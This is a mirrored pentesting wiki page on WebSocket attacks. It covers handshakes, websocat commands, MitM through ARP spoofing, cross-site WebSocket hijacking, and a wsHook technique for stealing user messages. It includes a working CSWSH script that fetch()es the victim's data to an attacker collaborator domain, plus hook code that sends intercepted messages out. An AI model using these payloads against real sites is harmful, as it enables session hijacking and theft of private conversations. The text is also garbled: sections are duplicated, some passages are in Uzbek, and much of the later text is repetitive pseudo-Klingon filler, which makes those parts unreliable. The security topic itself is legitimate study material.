Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/websocket-attacks.md
Translator workflow b442ae90c4 Translated to Klingon
2024-02-10 17:52:19 +00:00

13 KiB
Raw Permalink Blame History

WebSocket Attacks

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

What are WebSockets

WebSocket connections are established through an initial HTTP handshake and are designed to be long-lived, allowing for bidirectional messaging at any time without the need for a transactional system. This makes WebSockets particularly advantageous for applications requiring low latency or server-initiated communication, such as live financial data streams.

Establishment of WebSocket Connections

A detailed explanation on establishing WebSocket connections can be accessed here. In summary, WebSocket connections are usually initiated via client-side JavaScript as shown below:

var ws = new WebSocket("wss://normal-website.com/ws");

The wss protocol signifies a WebSocket connection secured with TLS, whereas ws indicates an unsecured connection.

During the connection establishment, a handshake is performed between the browser and server over HTTP. The handshake process involves the browser sending a request and the server responding, as illustrated in the following examples:

Browser sends a handshake request:

GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket

Server's handshake response:

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=

Translation (Klingon):

HTTP/1.1 101 Protokolmeyvam vItlhutlh
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=

HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=

WebSocket Handshake-ning Key Points:

  • Connection je Upgrade headerlar WebSocket handshake-ni boshlashini bildiradi.
  • Sec-WebSocket-Version header WebSocket protokolining istalgan versiyasini, odatda 13 ni ko'rsatadi.
  • Sec-WebSocket-Key headerda Base64 kodlangan tasodifiy qiymat yuboriladi, bu har bir handshake-ni unikal qiladi va keshlovchi proksilarni muammo yaratishni oldini olishga yordam beradi. Ushbu qiymat autentifikatsiya uchun emas, balki javobning noto'g'ri sozlashga ega server yoki kesh tomonidan generatsiyalanganligini tasdiqlaydi.
  • Serverning javobidagi Sec-WebSocket-Accept header Sec-WebSocket-Key ning hash qiymatidir, bu serverning WebSocket ulanishni ochishni istaganligini tasdiqlaydi.

Ushbu xususiyatlar handshake jarayonini xavfsiz va ishonchli qilishda yordam beradi, shuningdek samarali vaqti bilan bir xil aloqani ta'minlaydi.

Linux konsoli

websocat ni ishlatib, websocket bilan to'g'ridan-to'g'ri ulanishni o'rnatishingiz mumkin.

websocat --insecure wss://10.10.10.10:8000 -v

Or to create a websocat server:

Klingon Translation:

ghItlhweS 'ej websocat Server Qap:

websocat -s 0.0.0.0:8000 #Listen in port 8000

MitM websocket connections

If you find that clients are connected to a HTTP websocket from your current local network you could try an ARP Spoofing Attack to perform a MitM attack between the client and the server.
Once the client is trying to connect to you can then use:

MitM websocket connections

If you find that clients are connected to a HTTP websocket from your current local network you could try an ARP Spoofing Attack to perform a MitM attack between the client and the server.
Once the client is trying to connect to you can then use:

websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v

Websockets enumeration

tool https://github.com/PalindromeLabs/STEWS to discover, fingerprint and search for known vulnerabilities in websockets automatically.

Websocket Debug tools

  • Burp Suite supports MitM websockets communication in a very similar way it does it for regular HTTP communication.
  • The socketsleuth Burp Suite extension will allow you to manage better Websocket communications in Burp by getting the history, setting interception rules, using match and replace rules, using Intruder and AutoRepeater.
  • WSSiP: Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server.
  • wsrepl is an interactive websocket REPL designed specifically for penetration testing. It provides an interface for observing incoming websocket messages and sending new ones, with an easy-to-use framework for automating this communication.
  • https://websocketking.com/ it's a web to communicate with other webs using websockets.
  • https://hoppscotch.io/realtime/websocket among other types of communications/protocols, it provides a web to communicate with other webs using websockets.

Websocket Lab

In Burp-Suite-Extender-Montoya-Course you have a code to launch a web using websockets and in this post you can find an explanation.

Cross-site WebSocket hijacking (CSWSH)

Cross-site WebSocket hijacking, also known as cross-origin WebSocket hijacking, is identified as a specific case of Cross-Site Request Forgery (CSRF) affecting WebSocket handshakes. This vulnerability arises when WebSocket handshakes authenticate solely via HTTP cookies without CSRF tokens or similar security measures.

Attackers can exploit this by hosting a malicious web page that initiates a cross-site WebSocket connection to a vulnerable application. Consequently, this connection is treated as part of the victim's session with the application, exploiting the lack of CSRF protection in the session handling mechanism.

Simple Attack

Note that when establishing a websocket connection the cookie is sent to the server. The server might be using it to relate each specific user with his websocket session based on the sent cookie.

Then, if for example the websocket server sends back the history of the conversation of a user if a msg with "READY" is sent, then a simple XSS establishing the connection (the cookie will be sent automatically to authorise the victim user) sending "READY" will be able to retrieve the history of the conversation.

<script>
websocket = new WebSocket('wss://your-websocket-URL')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
websocket.send("READY"); //Send the message to retreive confidential information
}
function handleReply(event) {
//Exfiltrate the confidential information to attackers server
fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
}
</script>

Cross Origin + Cookie with a different subdomain

In this blog post https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/ the attacker managed to execute arbitrary Javascript in a subdomain of the domain where the web socket communication was occurring. Because it was a subdomain, the cookie was being sent, and because the Websocket didn't check the Origin properly, it was possible to communicate with it and steal tokens from it.

Stealing data from user

Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code:

Cross Origin + Cookie with a different subdomain

In this blog post https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/ the attacker managed to execute arbitrary Javascript in a subdomain of the domain where the web socket communication was occurring. Because it was a subdomain, the cookie was being sent, and because the Websocket didn't check the Origin properly, it was possible to communicate with it and steal tokens from it.

Stealing data from user

Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code:

//This is the script tag to load the websocket hooker
<script src='wsHook.js'></script>

//These are the functions that are gonig to be executed before a message
//is sent by the client or received from the server
//These code must be between some <script> tags or inside a .js file
wsHook.before = function(data, url) {
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "client_msg?m="+data, true);
xhttp.send();
}
wsHook.after = function(messageEvent, url, wsObject) {
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "server_msg?m="+messageEvent.data, true);
xhttp.send();
return messageEvent;
}

Daq download 'wsHook.js' file from https://github.com/skepticfx/wshook 'ej web qawHaqDaq jImej.
web ghaH 'ej 'oH user connect 'e' vItlhutlh, 'ej websocket vItlhutlh je messages ngeHbe'lu'chugh.

sudo python3 -m http.server 80

Race Conditions

WebSocketsDaq Race Conditions vItlhutlh. ghItlh vItlhutlh vItlhutlh.

QaD vulnerabilities

Web Sockets vItlhutlh server side teywI'wI' je client side teywI'wI' vItlhutlh, server je client teywI'wI' vItlhutlh XSS, SQLi je web vuln common vItlhutlh websocket input user vIlo'.

WebSocket Smuggling

vItlhutlh vItlhutlh reverse proxies restrictions bypass websocket communication vItlhutlh (vaj vItlhutlh). vItlhutlh vItlhutlh hidden endpoints. vItlhutlh vItlhutlh vItlhutlh:

{% content-ref url="h2c-smuggling.md" %} h2c-smuggling.md {% endcontent-ref %}

References

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: